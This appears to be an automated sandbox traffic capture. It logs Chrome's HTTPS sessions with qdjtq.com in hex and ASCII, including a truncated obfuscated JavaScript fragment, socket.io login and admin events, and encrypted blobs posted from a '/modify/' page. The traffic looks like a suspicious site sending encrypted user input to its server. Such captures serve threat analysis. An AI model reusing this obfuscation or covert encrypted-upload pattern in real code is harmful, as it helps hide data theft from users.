            2024-09-27 00:30:00 UTC14031INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 33 37 5f 30 78 33 39 31 38 28 5f 30 78 35 35 31 65 30 61 2c 5f 30 78 33 31 62 61 38 39 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 35 65 61 31 3d 61 33 37 5f 30 78 31 66 63 37 28 29 3b 72 65 74 75 72 6e 20 61 33 37 5f 30 78 33 39 31 38 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 63 34 66 65 36 2c 5f 30 78 31 31 66 37 32 34 29 7b 5f 30 78 33 63 34 66 65 36 3d 5f 30 78 33 63 34 66 65 36 2d 30 78 61 39 3b 6c 65 74 20 5f 30 78 31 66 63 37 64 65 3d 5f 30 78 35 63 35 65 61 31 5b 5f 30 78 33 63 34 66 65 36 5d 3b 72 65 74 75 72 6e 20 5f 30 78 31 66 63 37 64 65 3b 7d 2c 61 33 37 5f 30 78 33 39 31 38 28 5f 30 78 35 35 31 65 30 61 2c 5f 30 78 33 31 62 61 38 39 29 3b 7d 63 6f 6e 73 74 20 61 33 37 5f 30 78 31 36 39 39 36 31 3d 61 33 37 5f 30 78
            Data Ascii: function a37_0x3918(_0x551e0a,_0x31ba89){const _0x5c5ea1=a37_0x1fc7();return a37_0x3918=function(_0x3c4fe6,_0x11f724){_0x3c4fe6=_0x3c4fe6-0xa9;let _0x1fc7de=_0x5c5ea1[_0x3c4fe6];return _0x1fc7de;},a37_0x3918(_0x551e0a,_0x31ba89);}const a37_0x169961=a37_0x


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            122192.168.2.649847129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:00 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHty HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:01 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:01 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:01 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            123192.168.2.649848129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:02 UTC550OUTGET /socket.io/?EIO=4&transport=polling&t=P8mudFX HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:02 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:02 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:02 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 52 63 49 6c 55 77 79 5a 59 4d 6d 57 41 6e 73 50 41 48 74 31 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"RcIlUwyZYMmWAnsPAHt1","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            124192.168.2.649849129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:02 UTC611OUTPOST /api/MC4yMTY3NjQ0NTM3Mjk2OTA5 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 316
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-platform: "Windows"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Content-Type: text/encrypt
            Accept: */*
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:02 UTC316OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 2b 56 2b 49 6c 79 57 72 77 39 46 76 63 58 66 72 41 55 6e 4a 76 70 51 43 36 41 31 4f 6d 48 54 73 62 6a 2b 54 34 76 4b 47 69 57 44 35 72 38 77 66 44 71 55 76 6b 79 4b 2b 66 37 6c 6e 31 72 4b 6a 52 44 61 4a 34 72 72 55 49 4b 74 61 73 42 4d 4a 4c 2b 45 47 37 31 5a 44 2f 61 56 78 75 5a 58 50 4d 66 55 69 61 31 77 6d 41 68 73 70 31 57 39 74 6e 76 78 59 66 36 54 6d 35 65 58 66 38 2f 66 4b 67 51 73 72 67 52 63 63 58 4a 6d 52 30 6a 46 49 77 57 4c 6c 5a 63 37 4b 30 4a 6e 76 4b 36 65 32 41 48 49 4c 55 59 2f 57 6d 43 73 38 30 42 4d 33 42 53 47 76 6c 76 57 68 61 6a 4a 4d 70 2b 73 38 77 4c 34 42 34 66 68 44 77 77 74 56 49 7a 6b 46 50 61 41 71 4f 75 38 32 63 66 53 69 35 2f 46 5a 74 6b 2f 64 58 4d 69 79 76 64 46 2f 52 51 76 36 6b 75 50 75 52
            Data Ascii: U2FsdGVkX1+V+IlyWrw9FvcXfrAUnJvpQC6A1OmHTsbj+T4vKGiWD5r8wfDqUvkyK+f7ln1rKjRDaJ4rrUIKtasBMJL+EG71ZD/aVxuZXPMfUia1wmAhsp1W9tnvxYf6Tm5eXf8/fKgQsrgRccXJmR0jFIwWLlZc7K0JnvK6e2AHILUY/WmCs80BM3BSGvlvWhajJMp+s8wL4B4fhDwwtVIzkFPaAqOu82cfSi5/FZtk/dXMiyvdF/RQv6kuPuR
            2024-09-27 00:30:03 UTC238INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:02 GMT
            Content-Type: application/json; charset=utf-8
            Content-Length: 36
            Connection: close
            Access-Control-Allow-Origin: *
            ETag: W/"24-OoAYnlrRvsXB1fLshbvZcPbyhbg"
            2024-09-27 00:30:03 UTC36INData Raw: 55 32 46 73 64 47 56 6b 58 31 2f 59 61 71 57 4b 65 4c 78 6a 57 6f 4c 52 67 68 6d 69 72 56 4f 6c 4b 41 63 3d
            Data Ascii: U2FsdGVkX1/YaqWKeLxjWoLRghmirVOlKAc=


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            125192.168.2.649850129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:03 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mudde&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 2
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:03 UTC2OUTData Raw: 34 30
            Data Ascii: 40
            2024-09-27 00:30:04 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:04 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:04 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            126192.168.2.649853129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:03 UTC377OUTGET /socket.io/?EIO=4&transport=polling&t=P8mudFX HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:04 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:04 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:04 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 55 51 51 59 77 59 39 66 44 54 31 6c 64 4a 79 6c 41 48 74 33 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"UQQYwY9fDT1ldJylAHt3","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            127192.168.2.649852129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:03 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8muddg&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:04 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:04 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 32
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:04 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 52 30 51 6d 44 49 73 5f 77 34 6e 73 66 54 47 49 41 48 74 32 22 7d
            Data Ascii: 40{"sid":"R0QmDIs_w4nsfTGIAHt2"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            128192.168.2.649851129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:03 UTC543OUTGET /socket.io/?EIO=4&transport=websocket&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: Upgrade
            Pragma: no-cache
            Cache-Control: no-cache
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Upgrade: websocket
            Origin: https://qdjtq.com
            Sec-WebSocket-Version: 13
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Sec-WebSocket-Key: rtS9BSIOS4dfLfnNzoL9aA==
            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            2024-09-27 00:30:04 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:04 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:04 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 22{"code":3,"message":"Bad request"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            129192.168.2.649854129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:03 UTC361OUTGET /api/MC4yMTY3NjQ0NTM3Mjk2OTA5 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:04 UTC164INHTTP/1.1 404 Not Found
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:04 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:04 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            130192.168.2.649855129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:05 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mudde&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:05 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:05 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 63
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:05 UTC63INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 38 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 74 72 75 65 5d
            Data Ascii: 42["online-count-user",8,"user-user-VCWLaoDbYs5J0K0KAHtt",true]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            131192.168.2.649856129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:05 UTC663OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mudzw&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 54
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:05 UTC54OUTData Raw: 34 32 35 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 75 73 65 72 2d 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 2c 5b 22 75 73 65 72 22 5d 5d
            Data Ascii: 425["login","user-user-VCWLaoDbYs5J0K0KAHtt",["user"]]
            2024-09-27 00:30:05 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:05 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:05 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            132192.168.2.649857129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:05 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mudzt&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:05 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:05 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 98
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:05 UTC98INData Raw: 34 33 35 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 46 72 69 20 53 65 70 20 32 37 20 32 30 32 34 20 30 30 3a 33 30 3a 30 34 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
            Data Ascii: 435[{"code":0,"msg":"ok","time":"Fri Sep 27 2024 00:30:04 GMT+0000 (Coordinated Universal Time)"}]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            133192.168.2.649858129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:05 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8muddg&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:07 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:06 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 19
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:07 UTC19INData Raw: 34 33 36 5b 7b 22 61 64 6d 69 6e 22 3a 74 72 75 65 7d 5d
            Data Ascii: 436[{"admin":true}]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            134192.168.2.649859129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:06 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mudzw&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:07 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:07 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:07 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            135192.168.2.649861129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:06 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mudzt&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:07 UTC214INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:07 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 1
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:07 UTC1INData Raw: 31
            Data Ascii: 1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            136192.168.2.649860129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:06 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8mueK9&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:07 UTC166INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:07 GMT
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:07 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            137192.168.2.649862129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:06 UTC664OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mueO2&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 647
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:06 UTC647OUTData Raw: 34 32 36 5b 22 6d 65 73 73 61 67 65 22 2c 7b 22 6d 73 67 22 3a 7b 22 74 79 70 65 22 3a 22 55 32 46 73 64 47 56 6b 58 31 2b 34 72 4d 73 4c 70 78 69 34 37 54 6e 76 62 36 2f 66 45 6e 37 69 65 69 4c 4c 22 2c 22 64 61 74 61 22 3a 22 55 32 46 73 64 47 56 6b 58 31 38 4c 76 4c 4d 30 37 57 30 78 39 4f 43 52 70 4c 6b 31 73 31 36 6f 64 6c 4b 38 47 59 48 36 2f 59 4a 4b 34 46 35 43 7a 53 72 51 6d 48 4c 39 4e 59 4d 70 58 78 42 6c 72 61 6b 66 64 39 54 30 61 38 65 59 39 44 6b 57 44 49 47 46 75 48 4d 4d 7a 49 54 7a 38 46 59 52 42 79 39 54 68 79 71 62 33 65 36 64 36 68 6c 44 67 66 4c 73 63 64 38 59 59 35 32 41 69 78 46 75 46 44 6f 36 49 46 62 44 52 37 70 75 6f 6b 50 49 33 58 7a 33 43 61 35 51 6a 46 6b 6a 50 41 32 6c 32 73 68 78 66 5a 32 47 44 53 45 51 69 4c 30 74 7a 42 7a
            Data Ascii: 426["message",{"msg":{"type":"U2FsdGVkX1+4rMsLpxi47Tnvb6/fEn7ieiLL","data":"U2FsdGVkX18LvLM07W0x9OCRpLk1s16odlK8GYH6/YJK4F5CzSrQmHL9NYMpXxBlrakfd9T0a8eY9DkWDIGFuHMMzITz8FYRBy9Thyqb3e6d6hlDgfLscd8YY52AixFuFDo6IFbDR7puokPI3Xz3Ca5QjFkjPA2l2shxfZ2GDSEQiL0tzBz
            2024-09-27 00:30:07 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:06 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:30:07 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            138192.168.2.649864129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:30:08 UTC402OUTGET /socket.io/?EIO=4&transport=polling&t=P8mueO2&sid=RcIlUwyZYMmWAnsPAHt1 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:30:08 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:30:08 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:30:08 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
